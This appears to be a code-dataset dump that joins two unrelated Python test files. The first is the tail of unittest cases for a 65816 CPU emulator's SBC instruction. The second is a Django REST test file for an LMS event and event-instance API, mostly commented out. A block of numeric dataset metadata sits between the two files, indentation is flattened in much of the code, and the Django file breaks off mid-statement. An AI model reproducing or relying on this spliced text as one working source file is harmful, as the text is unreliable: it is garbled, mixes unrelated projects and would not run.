# $0013 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xE1, 0x10))
self._write(mpu.memory, 0x0013, (0xED, 0xFE))
mpu.x = 0x03
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_ind_x_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC ($10,X)
# $0013 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xE1, 0x10))
self._write(mpu.memory, 0x0013, (0xED, 0xFE))
mpu.x = 0x03
self._write(mpu.memory, 0xFEED, (0x02, 0x00))
mpu.step()
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# SBC Direct Page, Indirect
def test_sbc_dp_ind_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
# $0000 SBC ($10)
# $0010 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xF2, 0x10))
self._write(mpu.memory, 0x0010, (0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_ind_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC ($10)
# $0010 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xF2, 0x10))
self._write(mpu.memory, 0x0010, (0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_ind_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# $0000 SBC ($10)
# $0010 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xF2, 0x10))
self._write(mpu.memory, 0x0010, (0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_ind_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC ($10)
# $0010 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xF2, 0x10))
self._write(mpu.memory, 0x0010, (0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x02, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# SBC Direct Page Indexed, Indirect (Y)
def test_sbc_ind_y_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
mpu.y = 0x03
# $0000 SBC ($10),Y
# $0010 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xF1, 0x10))
self._write(mpu.memory, 0x0010, (0xED, 0xFE))
self._write(mpu.memory, 0xFEED + mpu.y, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_ind_y_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
mpu.y = 0x03
# $0000 SBC ($10),Y
# $0010 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xF1, 0x10))
self._write(mpu.memory, 0x0010, (0xED, 0xFE))
self._write(mpu.memory, 0xFEED + mpu.y, (0x01, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_ind_y_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
mpu.y = 0x03
# $0000 SBC ($10),Y
# $0010 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xF1, 0x10))
self._write(mpu.memory, 0x0010, (0xED, 0xFE))
self._write(mpu.memory, 0xFEED + mpu.y, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
        self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_ind_y_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC ($10),Y
# $0010 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xF1, 0x10))
self._write(mpu.memory, 0x0010, (0xED, 0xFE))
self._write(mpu.memory, 0xFEED + mpu.y, (0x02, 0x00))
mpu.step()
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
        self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# SBC Immediate
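    # For SBC the carry flag is an inverted borrow: the operation computes
    # A = A - M - (1 - C), so a set CARRY means "no borrow in" and a cleared
    # CARRY models a borrow of 1.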
def test_sbc_imm_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
# $0000 SBC #$00
self._write(mpu.memory, 0x0000, (0xE9, 0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
        self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_imm_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC #$01
self._write(mpu.memory, 0x0000, (0xE9, 0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
        self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_imm_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# $0000 SBC #$00
self._write(mpu.memory, 0x0000, (0xE9, 0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
        self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_imm_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC #$02
self._write(mpu.memory, 0x0000, (0xE9, 0x02, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
        self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# def test_sbc_bcd_on_immediate_0a_minus_00_carry_set(self):
# mpu = self._make_mpu()
# mpu.p |= mpu.DECIMAL
# mpu.p |= mpu.CARRY
# mpu.a = 0x0a
# # $0000 SBC #$00
# self._write(mpu.memory, 0x0000, (0xe9, 0x00, 0x00))
# mpu.step()
# self.assertEqual(0x0003, mpu.pc)
# self.assertEqual(0x0a, mpu.a)
# self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# self.assertEqual(0, mpu.p & mpu.OVERFLOW)
# self.assertEqual(0, mpu.p & mpu.ZERO)
# self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
#
# def test_sbc_bcd_on_immediate_9a_minus_00_carry_set(self):
# mpu = self._make_mpu()
# mpu.p |= mpu.DECIMAL
# mpu.p |= mpu.CARRY
# mpu.a = 0x9a
# #$0000 SBC #$00
# self._write(mpu.memory, 0x0000, (0xe9, 0x00, 0x00))
# mpu.step()
# self.assertEqual(0x0003, mpu.pc)
# self.assertEqual(0x9a, mpu.a)
# self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
# self.assertEqual(0, mpu.p & mpu.OVERFLOW)
# self.assertEqual(0, mpu.p & mpu.ZERO)
# self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
#
# def test_sbc_bcd_on_immediate_00_minus_01_carry_set(self):
# mpu = self._make_mpu()
# mpu.p |= mpu.DECIMAL
# mpu.p |= mpu.OVERFLOW
# mpu.p |= mpu.ZERO
# mpu.p |= mpu.CARRY
# mpu.a = 0x00
# # => $0000 SBC #$00
# self._write(mpu.memory, 0x0000, (0xe9, 0x01, 0x00))
# mpu.step()
# self.assertEqual(0x0003, mpu.pc)
# self.assertEqual(0x99, mpu.a)
# self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
# self.assertEqual(0, mpu.p & mpu.OVERFLOW)
# self.assertEqual(0, mpu.p & mpu.ZERO)
# self.assertEqual(0, mpu.p & mpu.CARRY)
#
# def test_sbc_bcd_on_immediate_20_minus_0a_carry_unset(self):
# mpu = self._make_mpu()
# mpu.p |= mpu.DECIMAL
# mpu.a = 0x20
# # $0000 SBC #$00
# self._write(mpu.memory, 0x0000, (0xe9, 0x0a, 0x00))
# mpu.step()
# self.assertEqual(0x0003, mpu.pc)
# self.assertEqual(0x1f, mpu.a)
# self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# self.assertEqual(0, mpu.p & mpu.OVERFLOW)
# self.assertEqual(0, mpu.p & mpu.ZERO)
# self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# Test Helpers
def _make_mpu(self, *args, **kargs):
klass = self._get_target_class()
mpu = klass(*args, **kargs)
if 'memory' not in kargs:
mpu.memory = 0x30000 * [0xAA]
# set native mode
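        # CLC followed by XCE is the standard 65816 idiom for leaving
        # emulation mode: XCE exchanges the carry flag with the emulation
        # bit, so clearing carry first lands the CPU in native mode.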
mpu.pCLR(mpu.CARRY)
mpu.inst_0xfb() # XCE
mpu.pCLR(mpu.CARRY) # many 6502 based tests expect the carry flag to be clear
mpu.pCLR(mpu.MS)
mpu.pCLR(mpu.IRS)
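        # clearing the MS and IRS width bits selects a 16-bit accumulator and
        # 16-bit index registers, which is what these tests assume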
        # py65 mpus have sp set to $ff. I've modeled the 65816 on the
        # physical chip, which requires sp to be set in software. The core
        # tests assume sp is set to $ff, so we have to set it here.
mpu.sp = 0x1ff
return mpu
def _write(self, memory, start_address, bytes):
memory[start_address:start_address + len(bytes)] = bytes
def _get_target_class(self):
return devices.mpu65c816.MPU
def test_suite():
return unittest.findTestCases(sys.modules[__name__])
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
| 37.397556
| 150
| 0.602875
| 16,688
| 119,373
| 4.124401
| 0.021273
| 0.202243
| 0.060615
| 0.114546
| 0.968458
| 0.961673
| 0.955411
| 0.947652
| 0.946068
| 0.942698
| 0
| 0.100694
| 0.266149
| 119,373
| 3,191
| 151
| 37.409276
| 0.684996
| 0.084969
| 0
| 0.859952
| 0
| 0
| 0.000276
| 0
| 0
| 0
| 0.095473
| 0.000313
| 0.366774
| 1
| 0.090289
| false
| 0
| 0.001204
| 0.000803
| 0.093098
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1e7deeaac14b4b83a97ab93772ad4ccfbd922132
| 28,592
|
py
|
Python
|
lms/tests/event/test_event_views.py
|
yankai14/event-management-telegram-bot-backend
|
c0b4b2294ab7d06100b221d9b41a8f52d500075d
|
[
"MIT"
] | null | null | null |
lms/tests/event/test_event_views.py
|
yankai14/event-management-telegram-bot-backend
|
c0b4b2294ab7d06100b221d9b41a8f52d500075d
|
[
"MIT"
] | 6
|
2021-06-28T07:23:15.000Z
|
2021-07-22T12:59:33.000Z
|
lms/tests/event/test_event_views.py
|
yankai14/event-management-telegram-bot-backend
|
c0b4b2294ab7d06100b221d9b41a8f52d500075d
|
[
"MIT"
] | null | null | null |
import json
import datetime
from lms.signals import Signals
from re import S
from typing import OrderedDict
from unittest.mock import MagicMock
from django.utils import timezone
from django.urls import reverse
from rest_framework.test import APITestCase
from rest_framework import status
from lms.models.event_models import Event, EventInstance, EventInstanceFolder, EventInstanceFolderPermissions
from lms.models.user_models import User
from lms.tests.helper_functions import login
from lms.utils.drive_service import GDriveService
from django.db.models import signals
# class GetEventViewTest(APITestCase):
# def setUp(self):
# self.validPayload = {
# "eventCode": "T101",
# "name": "testEvent1",
# "description": "This is my description"
# }
# self.user, self.client = login()
# def test_get_specific_event(self):
# Event.objects.create(**self.validPayload)
# url = reverse('event-view', kwargs={"eventCode": "T101"})
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# def test_get_event_list_pagination(self):
# for n in range(51):
# payload = self.validPayload
# payload["eventCode"] += str(n)
# Event.objects.create(**payload)
# response = self.client.get(
# reverse("event-view")
# )
# self.assertEqual(len(response.data["results"]), 15)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# class CreateEventViewTest(APITestCase):
# def setUp(self):
# self.validPayload = {
# "eventCode": "T101",
# "name": "testEvent1",
# "description": "This is my description"
# }
# self.invalidPayload = {
# "eventCode": "",
# "name": "invalidTestEvent",
# "description": "This is my description"
# }
# self.user, self.client = login()
# def test_create_valid_event(self):
# response = self.client.post(
# reverse("event-view"),
# data=json.dumps(self.validPayload),
# content_type='application/json'
# )
# proposed_response = response.data
# del proposed_response['id']
# self.assertDictEqual(self.validPayload, proposed_response)
# self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# def test_create_invalid_event_no_event_code(self):
# response = self.client.post(
# reverse("event-view"),
# data=json.dumps(self.invalidPayload),
# content_type='application/json'
# )
# self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# def test_create_duplicated_event(self):
# Event.objects.create(**self.validPayload)
# response = self.client.post(
# reverse("event-view"),
# data=json.dumps(self.validPayload),
# content_type='application/json'
# )
# self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# class UpdateEventViewTest(APITestCase):
# def setUp(self):
# self.validPayload = {
# "eventCode": "T101",
# "name": "testEvent1",
# "description": "This is my description"
# }
# self.updatedPayload = {
# "eventCode": "T101",
# "name": "updatedTestEvent",
# "description": "This is my description"
# }
# self.user, self.client = login()
# self.testEvent = Event.objects.create(**self.validPayload)
# def test_update_event(self):
# url = reverse('event-view', kwargs={"eventCode": "T101"})
# response = self.client.put(
# url,
# data=json.dumps(self.updatedPayload),
# content_type='application/json'
# )
# proposedResponse = response.data
# del proposedResponse['id']
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertDictEqual(self.updatedPayload, proposedResponse)
# def test_update_invalid_event(self):
# url = reverse('event-view', kwargs={"eventCode": "T102"})
# response = self.client.put(
# url,
# data=json.dumps(self.updatedPayload),
# content_type='application/json'
# )
# self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# class DeleteEventViewTest(APITestCase):
# def setUp(self):
# self.validPayload = {
# "eventCode": "T101",
# "name": "testEvent1",
# "description": "This is my description"
# }
# self.user, self.client = login()
# self.testEvent = Event.objects.create(**self.validPayload)
# def test_delete_event(self):
# url = reverse('event-view', kwargs={"eventCode": "T101"})
# response = self.client.delete(url)
# self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
# def test_delete_invalid_event(self):
# url = reverse('event-view', kwargs={"eventCode": "T102"})
# response = self.client.delete(url)
# self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# class GetEventInstanceViewTest(APITestCase):
# def setUp(self):
# Signals.create_folder = MagicMock()
# testEvent = Event.objects.create(
# eventCode="T101", name="testEvent1", description="This is my description")
# self.validPayload = {
# "eventInstanceCode": "Test101",
# "startDate": timezone.now(),
# "endDate": timezone.now() + datetime.timedelta(days=10),
# "location": "somewhere",
# "dates": [timezone.now() + datetime.timedelta(days=10+n) for n in range(5)],
# "isCompleted": False,
# "event": testEvent,
# "fee": 0
# }
# self.user, self.client = login()
# self.testEventInstance = EventInstance.objects.create(
# **self.validPayload)
# def test_get_specific_event_instance_by_event_instance_code(self):
# url = reverse('event-instance-view',
# kwargs={"eventInstanceCode": "Test101"})
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# def test_get_specific_event_instance_by_invalid_event_instance_code(self):
# url = reverse('event-instance-view',
# kwargs={"eventInstanceCode": "Invalid"})
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# def test_get_specific_event_instance_by_event_code(self):
# url = f"{reverse('event-instance-view')}?event=Test101"
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# def test_get_specific_event_instance_by_isCompleted(self):
# url = f"{reverse('event-instance-view')}?isCompleted=False"
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# def test_get_specific_event_instance_by_invalid_event_code(self):
# url = f"{reverse('event-instance-view')}?event=Invalid"
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertEqual(response.data.get("count"), 0)
# def test_get_event_instance_list(self):
# response = self.client.get(
# reverse("event-instance-view")
# )
# self.assertEqual(response.data.get("count"), 1)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
class CreateEventInstanceViewTest(APITestCase):
def setUp(self):
Event.objects.create(eventCode="T101", name="testEvent1",
description="This is my description")
self.validPayload = {
"eventCode": "T101",
"eventInstanceCode": "Test101",
"startDate": str(timezone.now()),
"endDate": str(timezone.now() + datetime.timedelta(days=10)),
"location": "somewhere",
"dates": [str(timezone.now() + datetime.timedelta(days=10+n)) for n in range(5)],
"isCompleted": "True",
"fee": 0
}
self.user, self.client = login()
def test_create_valid_event_instance(self):
Signals.createFolderCallback = MagicMock()
url = reverse('event-instance-view')
response = self.client.post(
url,
data=json.dumps(self.validPayload),
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(EventInstance.objects.filter(
eventInstanceCode=self.validPayload.get("eventInstanceCode")).exists(), True)
def test_create_event_instance_invalid_eventCode(self):
Signals.createFolderCallback = MagicMock()
url = reverse('event-instance-view')
self.validPayload["eventCode"] = "T102"
response = self.client.post(
url,
data=json.dumps(self.validPayload),
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertEqual(EventInstance.objects.filter(
eventInstanceCode=self.validPayload.get("eventInstanceCode")).exists(), False)
def test_create_event_instance_existing_eventInstanceCode(self):
Signals.createFolderCallback = MagicMock()
validPayload = self.validPayload.copy()
del validPayload["eventCode"]
EventInstance.objects.create(**validPayload)
url = reverse('event-instance-view')
response = self.client.post(
url,
data=json.dumps(self.validPayload),
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(EventInstance.objects.filter(
eventInstanceCode=self.validPayload.get("eventInstanceCode")).count(), 1)
# class DeleteEventInstanceViewTest(APITestCase):
# def setUp(self):
# Signals.create_folder = MagicMock()
# Event.objects.create(eventCode="T101", name="testEvent1",
# description="This is my description")
# self.validPayload = {
# "eventCode": "T101",
# "eventInstanceCode": "Test101",
# "startDate": str(timezone.now()),
# "endDate": str(timezone.now() + datetime.timedelta(days=10)),
# "location": "somewhere",
# "dates": [str(timezone.now() + datetime.timedelta(days=10+n)) for n in range(5)],
# "isCompleted": "True",
# "fee": 0
# }
# self.user, self.client = login()
# validPayload = self.validPayload.copy()
# del validPayload["eventCode"]
# self.testEventInstance = EventInstance.objects.create(**validPayload)
# def test_update_valid_event_instance(self):
# url = reverse('event-instance-view',
# kwargs={"eventInstanceCode": "Test101"})
# response = self.client.delete(url)
# self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
# def test_delete_invalid_event_instance(self):
# url = reverse('event-instance-view',
# kwargs={"eventInstanceCode": "Invalid"})
# response = self.client.delete(url)
# self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# class UpdateEventInstanceViewTest(APITestCase):
# def setUp(self):
# Signals.create_folder = MagicMock()
# Event.objects.create(eventCode="T101", name="testEvent1",
# description="This is my description")
# self.validPayload = {
# "eventCode": "T101",
# "eventInstanceCode": "Test101",
# "startDate": str(timezone.now()),
# "endDate": str(timezone.now() + datetime.timedelta(days=10)),
# "location": "somewhere",
# "dates": [str(timezone.now() + datetime.timedelta(days=10+n)) for n in range(5)],
# "isCompleted": "True",
# "fee": 0,
# }
# self.updatedPayload = {
# "eventCode": "T101",
# "eventInstanceCode": "Test101",
# "startDate": str(timezone.now()),
# "endDate": str(timezone.now() + datetime.timedelta(days=10)),
# "location": "somewhere",
# "dates": [str(timezone.now() + datetime.timedelta(days=10+n)) for n in range(5)],
# "isCompleted": "False",
# "fee": 0
# }
# self.user, self.client = login()
# validPayload = self.validPayload.copy()
# del validPayload["eventCode"]
# self.testEventInstance = EventInstance.objects.create(**validPayload)
# def test_update_valid_event_instance(self):
# Signals.create_folder = MagicMock()
# url = reverse('event-instance-view',
# kwargs={"eventInstanceCode": "Test101"})
# response = self.client.put(
# url,
# data=json.dumps(self.updatedPayload),
# content_type='application/json'
# )
# Signals.create_folder.assert_not_called()
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# def test_update_invalid_event_instance(self):
# Signals.create_folder = MagicMock()
# url = reverse('event-instance-view',
# kwargs={"eventInstanceCode": "Invalid"})
# response = self.client.put(
# url,
# data=json.dumps(self.updatedPayload),
# content_type='application/json'
# )
# Signals.create_folder.assert_not_called()
# self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# class GetEventInstanceFolderViewTest(APITestCase):
# def setUp(self):
# event = Event.objects.create(
# eventCode="someEventCode",
# name="someName",
# description="someDescription"
# )
# eventInstance = EventInstance.objects.create(
# eventInstanceCode="someEventInstanceCode",
# startDate=str(timezone.now()),
# endDate=str(timezone.now() + datetime.timedelta(days=10)),
# location="somewhere",
# dates=[str(timezone.now() + datetime.timedelta(days=10+n))
# for n in range(5)],
# fee=0,
# isCompleted=False,
# event=event
# )
# EventInstanceFolder.objects.create(
# folderId="someTestId",
# folderName="someFolderName",
# eventInstance=eventInstance
# )
# eventInstance1 = EventInstance.objects.create(
# eventInstanceCode="someEventInstanceCode1",
# startDate=str(timezone.now()),
# endDate=str(timezone.now() + datetime.timedelta(days=10)),
# location="somewhere",
# dates=[str(timezone.now() + datetime.timedelta(days=10+n))
# for n in range(5)],
# fee=0,
# isCompleted=False,
# event=event
# )
# EventInstanceFolder.objects.create(
# folderId="someTestId1",
# folderName="someFolderName1",
# eventInstance=eventInstance1
# )
# self.expectedOutput = {
# "folderId": "someTestId",
# "folderName": "someFolderName",
# "eventInstance": "someEventInstanceCode"
# }
# # TODO: Create permissions and put into EventInstanceFolder to see if can see
# def test_get_list_of_event_instance_folders(self):
# url = reverse('event-instance-folder-view')
# response = self.client.get(url)
# proposedOutput = response.data["results"][0]
# del proposedOutput['id']
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertEqual(response.data["count"], 2)
# self.assertDictEqual(proposedOutput, self.expectedOutput)
# def test_filter_list_of_event_instance_from_event_instance(self):
# url = f"{reverse('event-instance-folder-view')}?eventInstance=someEventInstanceCode"
# response = self.client.get(url)
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertEqual(response.data["count"], 1)
# class PostEventInstanceFolderViewTest(APITestCase):
# def setUp(self):
# self.event = Event.objects.create(
# eventCode="someEventCode",
# name="someName",
# description="someDescription"
# )
# self.eventInstance = EventInstance.objects.create(
# eventInstanceCode="someEventInstanceCode",
# startDate=str(timezone.now()),
# endDate=str(timezone.now() + datetime.timedelta(days=10)),
# location="somewhere",
# dates=[str(timezone.now() + datetime.timedelta(days=10+n))
# for n in range(5)],
# fee=0,
# isCompleted=False,
# event=self.event
# )
# def test_create_valid_folder(self):
# GDriveService.create_folder = MagicMock(return_value="testId")
# url = reverse('event-instance-folder-view')
# validPayload = {
# "folderName": "testName",
# "eventInstanceCode": "someEventInstanceCode"
# }
# response = self.client.post(
# url,
# data=json.dumps(validPayload),
# content_type="application/json"
# )
# GDriveService.create_folder.assert_called_once()
# self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# def test_will_not_create_duplicate_folder_and_return_bad_request(self):
# GDriveService.create_folder = MagicMock(return_value="someFolderId")
# EventInstanceFolder.objects.create(
# folderId="someFolderId",
# folderName="someFolderName",
# eventInstance=self.eventInstance
# )
# validPayload = {
# "folderName": "someFolderName",
# "eventInstanceCode": "someEventInstanceCode"
# }
# url = reverse('event-instance-folder-view')
# response = self.client.post(
# url,
# data=json.dumps(validPayload),
# content_type="application/json"
# )
# GDriveService.create_folder.assert_not_called()
# self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# class DeleteEventInstanceFolderViewTest(APITestCase):
# def setUp(self):
# event = Event.objects.create(
# eventCode="someEventCode",
# name="someName",
# description="someDescription"
# )
# eventInstance = EventInstance.objects.create(
# eventInstanceCode="someEventInstanceCode",
# startDate=str(timezone.now()),
# endDate=str(timezone.now() + datetime.timedelta(days=10)),
# location="somewhere",
# dates=[str(timezone.now() + datetime.timedelta(days=10+n))
# for n in range(5)],
# fee=0,
# isCompleted=False,
# event=event
# )
# EventInstanceFolder.objects.create(
# folderId="someTestId",
# folderName="someFolderName",
# eventInstance=eventInstance
# )
# def test_delete_folder(self):
# GDriveService.delete_file_or_folder = MagicMock()
# url = reverse('event-instance-folder-view',
# kwargs={'folderId': 'someTestId'})
# response = self.client.delete(url)
# folderExist = EventInstanceFolder.objects.filter(
# folderId='someTestId').exists()
# GDriveService.delete_file_or_folder.assert_called_once_with(
# 'someTestId')
# self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
# self.assertEqual(folderExist, False)
# def test_delete_non_existant_folder(self):
# GDriveService.delete_file_or_folder = MagicMock()
# url = reverse('event-instance-folder-view',
# kwargs={'folderId': 'someIncorrectTestId'})
# response = self.client.delete(url)
# folderExist = EventInstanceFolder.objects.filter(
# folderId='someTestId').exists()
# GDriveService.delete_file_or_folder.assert_not_called()
# self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# self.assertEqual(folderExist, True)
# class GetEventFolderPermissionsTest(APITestCase):
# def setUp(self):
# self.user, self.client = login()
# event = Event.objects.create(
# eventCode="someEventCode",
# name="someName",
# description="someDescription"
# )
# eventInstance = EventInstance.objects.create(
# eventInstanceCode="someEventInstanceCode",
# startDate=str(timezone.now()),
# endDate=str(timezone.now() + datetime.timedelta(days=10)),
# location="somewhere",
# dates=[str(timezone.now() + datetime.timedelta(days=10+n))
# for n in range(5)],
# fee=0,
# isCompleted=False,
# event=event
# )
# folder = EventInstanceFolder.objects.create(
# folderId="someTestId",
# folderName="someFolderName",
# eventInstance=eventInstance
# )
# permission = EventInstanceFolderPermissions.objects.create(
# permissionId='testId',
# user=self.user,
# folderRole="reader"
# )
# permission.folder.add(folder)
# user2 = User.objects.create(
